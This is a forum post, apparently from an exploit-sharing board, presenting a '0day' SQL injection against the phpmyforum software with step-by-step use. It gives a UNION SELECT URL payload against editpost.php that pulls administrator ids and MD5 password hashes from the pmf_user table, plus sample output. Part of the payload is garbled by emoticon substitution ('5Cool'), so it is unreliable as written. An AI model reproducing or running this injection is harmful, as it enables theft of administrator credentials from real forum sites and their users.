Jump to content
Ras

phpmyforum SQL Injection

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
Here is a 0day sql injection for phpmyforum, admin hash disclosure. You need to register and post a message to make it work. This forum is completely in german, so it's a little hard to work with (if you're ignorant like me and don't know any other langs). 

1. Register at forum. 

2. Post a message in any forum. 

3. Open the url, replacing "24" with the id of your post. 
Codice: 
http://target/editpost.php?id=24+union+select+concat(char(58,58,5Cool,id,char(58,58,5Cool,pass,char(58,58,5 Cool),id+from+pmf_user+where+group_id=1+order+by+1+asc+/* 

4. The id and md5 hash should appear in the textarea on this page. It will look like: 
:::1:::21232f297a57a5a743894a0e4a801fc3:::

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...